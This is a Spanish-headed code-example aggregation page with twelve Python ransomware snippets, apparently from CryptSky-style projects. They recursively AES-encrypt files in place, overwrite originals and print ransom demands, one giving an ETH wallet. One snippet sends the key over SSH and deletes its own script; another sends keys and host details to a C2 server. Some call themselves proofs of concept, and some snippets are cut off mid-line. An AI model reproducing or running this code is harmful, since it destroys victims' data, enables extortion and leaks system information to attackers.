Ejemplo n.º 1
0
def main():
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    #Decrypt mode:
    if decrypt:

        # Get key from stdin
        key = binascii.unhexlify(decrypt)

        # TODO: Remove print
        print(binascii.hexlify(key))

        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

        pre_decrypt()

        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.decrypt)

    #Encrypt mode
    else:

        # Generate random 128 bits key
        key = Random.get_random_bytes(16)

        # TODO: Remove print
        print(binascii.hexlify(key))

        ctr = Counter.new(128)
        crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir, 0):
                modify.modify_file_inplace(file, crypt.encrypt)
        post_encrypt()

        # Send key over SSH; Notice hexlify before connect
        remote.connect(HOSTNAME, USERNAME, PASSWORD,
                       str(binascii.hexlify(key)))

        #Self destroy
        self_path = os.path.abspath(__file__)
        sp.call(["/bin/rm", self_path[:-12]])
        #sp.call(["/bin/rm", self_path[:-3]])

        #Popup Message
        popup()
Ejemplo n.º 2
0
def main():
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        key = 'saveusfrompsgpls'

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY

    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/Users/mercifulrookie/Desktop/syssec']
    #PUT YOURS PRAVIN, I USED /NARAYANAA

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)

    for _ in range(100):
        #key = random(32)
        pass

    if not decrypt:
        pass
Ejemplo n.º 3
0
def decrypt(key):
    if check_key(key):
        l = tkinter.Label(
            root,
            text="This is the correct key. \n"
            "Your files are being decrypted but it may take a while. Please wait..."
        )
        l.pack()
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)
        startdirs = START_DIR
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                (name, ext) = os.path.splitext(file)
                if ext in '.Cryptsky':
                    try:
                        modify.modify_file_inplace(file, crypt.encrypt)
                        os.rename(file, name)
                    except IOError:
                        print("Error")
        try:
            print()
            os.remove(r'C:\Windows\Temp\winUpdater.log')
        except FileNotFoundError:
            pass
        label = tkinter.Label(
            root, text="Congratulations. Your files are now decrypted")
        label.pack()
    else:
        return False
Ejemplo n.º 4
0
def main():
    parser = get_parser()
    args = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        print '''
Ransomware!
---------------
Your files have been encrypted.


'''
        key = raw_input('Enter Your Key> ')
    else:
        key = generate_key()

    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    startdirs = ['/media/bin4rygh0st/UBUNTU 19_1/']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
        print("Your System has been Decrypted!!")

    for _ in range(100):
        key = randint(0, 999999999999)
        pass

    if not decrypt:
        pass
Ejemplo n.º 5
0
def pre_decrypt():
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir, 1):
            ext = file.split('.')[-1]
            if ext == 'encrypted':
                os.rename(file, file[:-10])
            else:
                os.remove(file)
Ejemplo n.º 6
0
def main():
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        print '''
AnkurCryWare!
---------------
Your files have been encrypted. This is normally the part where I would
tell you to pay a ransom, and I will send you the decryption key. However, this
is an open source project to show how easy malware can be to write and to allow
others to view what may be one of the first fully open source python ransomwares.

This project does not aim to be malicious. The decryption key can be found
below, free of charge. Please be sure to type it in EXACTLY, or you risk losing
your files forever. Do not include the surrounding quotes, but do make sure
to match case, special characters, and anything else EXACTLY!
Happy decrypting and be more careful next time!

Your decryption key is: '{}'

'''.format(HARDCODED_KEY)
        key = raw_input('Enter Your Key> ')

    else:
        # In real ransomware, this part includes complicated key generation,
        # sending the key back to attackers and more
        # maybe I'll do that later. but for now, this will do.
        if HARDCODED_KEY:
            key = HARDCODED_KEY

        else:
            key = random(32)

    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # change this to fit your needs.
    startdirs = ['/']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
            os.rename(file, file+'.AnkurCryWare') # append filename to indicate crypted

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    for _ in range(100):
        key = random(32)
        pass

    if not decrypt:
        pass
         # post encrypt stuff
         # desktop picture
         # icon, etc
    print "Your device is encrypted by AnkurCryWare
Ejemplo n.º 7
0
def main():

    if PATH.is_file():
        print("Already Encrypted :)")
        window_thread = WindowThread()
        window_thread.start()
        time.sleep(10)
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
    else:

        key = HARDCODED_KEY
        ctr = Counter.new(128)
        crypt = AES.new(key.encode(), AES.MODE_CTR, counter=ctr)

        # change this to fit needs.
        startdirs = START_DIR

        # starts window so it appears while files are still being encrypted
        window_thread = WindowThread()
        window_thread.start()

        # encrypt files
        for currentDir in startdirs:
            for file in discover.discoverFiles(currentDir):
                try:
                    modify.modify_file_inplace(file, crypt.encrypt)
                    os.rename(
                        file, file +
                        '.Cryptsky')  # append filename to indicate crypted
                except IOError:
                    print("Error")

        # write evidence file to disk
        file = open(PATH, 'w+')
        file.write("JBOOZ encrypted this with a custom version of CryptSky. "
                   "The key for this version is: yellow submarine"
                   )  # you're welcome blue team ;)
        file.close()
        safe = tkinter.Label(
            root,
            text="It is now safe to stop execution of this program. "
            "Hopefully you found the key ;)")
        safe.pack()
        ''' # Taken out for Case Studies
Ejemplo n.º 8
0
def main():
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        print '''
*ULTRA YEET*
---------------
Your files have been encrypted. Pay a ransom of .5 ETH to 0x8dfaC9f5E011CD1Ce1d5b7537a1c6E9703902aCA
If you do not pay this ransom you're files will be lost >:3

Your decryption key will bee given to you once proof of payment is received

'''.format(HARDCODED_KEY)
        key = raw_input('Enter Your Key> ')

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY

        # else:
        #     key = random(32)

    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # change this to do what you want
    startdirs = ['/home']

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)
            #os.rename(file, file+'.Cryptsky') # append filename to indicate crypted

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    for _ in range(100):
        #key = random(32)
        pass

    if not decrypt:
        pass
Ejemplo n.º 9
0
def main():
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()        
        print('Usage: python3 main_v2.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)

    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt
    
    absolute_path = str(args.path)
    
    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True 
    # decrypt = False
    
    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop', 
                        # os.environ['USERPROFILE'] + '\\Documents',
                        # os.environ['USERPROFILE'] + '\\Music',
                        # os.environ['USERPROFILE'] + '\\Desktop',
                        # os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)
   
    # Encrypt AES key with attacker's embedded RSA public key 
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")

    print("Encrypted key " + encrypted_key_b64 + "\n")
 
    if encrypt:
        key = HARDCODED_KEY    
    if decrypt:
        # RSA Decryption function - warning that private key is hardcoded for testing purposes
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))

    # Create AES counter and AES cipher
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    
    # Recursively go through folders and encrypt/decrypt files
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)
            
    if encrypt: 
        # Exfiltrate encrypted key to C2
        def connector():
            server = socket.socket(socket.AF_INET)
            server.settimeout(10)
            try:
                # Send Key
                server.connect((host, port))
                msg = '%s$%s$%s$%s$%s$%s' % (
                    getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
                server.send(msg.encode('utf-8'))

                # if plt == "Windows"
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
            except Exception as e:
                # if plt == "Windows"
                # Do not send key, encrypt anyway.
                main = mainwindow(encrypted_key_b64)
                main.mainloop()
                pass
        try:
            connector()
        except KeyboardInterrupt:
            sys.exit(0)

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    for _ in range(100):
        #key = random(32)
        pass
Ejemplo n.º 10
0
def main():
    if len(sys.argv) <= 1:
        print('[*] Ransomware - PoC\n')
        # banner()
        print('Usage: python3 main.py -h')
        print('{} -h for help.'.format(sys.argv[0]))
        exit(0)

    # Parse arguments
    args = parse_args()
    encrypt = args.encrypt
    decrypt = args.decrypt

    absolute_path = str(args.path)

    # Force one click and comment out args above
    # absolute_path = "None"
    # encrypt = True
    # decrypt = False

    if absolute_path != 'None':
        startdirs = [absolute_path]
    else:
        # Check OS
        plt = platform.system()
        if plt == "Linux" or plt == "Darwin":
            startdirs = [os.environ['HOME'] + '/test_ransomware']
        elif plt == "Windows":
            startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
            # Can also hardcode additional directories
            # startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
            # os.environ['USERPROFILE'] + '\\Documents',
            # os.environ['USERPROFILE'] + '\\Music',
            # os.environ['USERPROFILE'] + '\\Desktop',
            # os.environ['USERPROFILE'] + '\\Onedrive']
        else:
            print("Unidentified system")
            exit(0)

    # Encrypt AES key with attacker's embedded RSA public key
    server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
    encryptor = PKCS1_OAEP.new(server_key)
    encrypted_key = encryptor.encrypt(HARDCODED_KEY)
    encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")

    print("Encrypted key " + encrypted_key_b64 + "\n")

    if encrypt:
        print("[COMPANY_NAME]\n\n"
              "YOUR NETWORK IS ENCRYPTED NOW\n\n"
              "USE - TO GET THE PRICE FOR YOUR DATA\n\n"
              "DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
              "DO NOT RENAME OR MOVE THE FILE\n\n"
              "THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
              "[begin_key]\n{}\n[end_key]\n"
              "KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
        key = HARDCODED_KEY
    if decrypt:
        # # RSA Decryption function - warning that private key is hardcoded for testing purposes
        rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
        decryptor = PKCS1_OAEP.new(rsa_key)
        key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))

    # Create AES counter and AES cipher
    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)

    # Recursively go through folders and encrypt/decrypt files
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            if encrypt and not file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                os.rename(file, file + extension)
                print("File changed from " + file + " to " + file + extension)
            if decrypt and file.endswith(extension):
                modify.modify_file_inplace(file, crypt.encrypt)
                file_original = os.path.splitext(file)[0]
                os.rename(file, file_original)
                print("File changed from " + file + " to " + file_original)

    # This wipes the key out of memory
    # to avoid recovery by third party tools
    for _ in range(100):
        #key = random(32)
        pass
Ejemplo n.º 11
0
    return parser


if __name__=="__main__":
    parser  = get_parser()
    args    = vars(parser.parse_args())
    decrypt = args['decrypt']

    if decrypt:
        key = 'saveusfrompsgpls'

    else:
        if HARDCODED_KEY:
            key = HARDCODED_KEY

    ctr = Counter.new(128)
    crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
    startdirs = ['/Users/testDirectory/']
    #PLEASE INSERT DIRECTORY ACCORDING TO YOUR NEED

    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir):
            modify.modify_file_inplace(file, crypt.encrypt)

    for _ in range(100):
        #key = random(32)
        pass

    if not decrypt:
        pass
Ejemplo n.º 12
0
def post_encrypt():
    for currentDir in startdirs:
        for file in discover.discoverFiles(currentDir, 0):
            shutil.copy2(file, file + '.encrypted')
            modify.overwrite_file_inplace(file)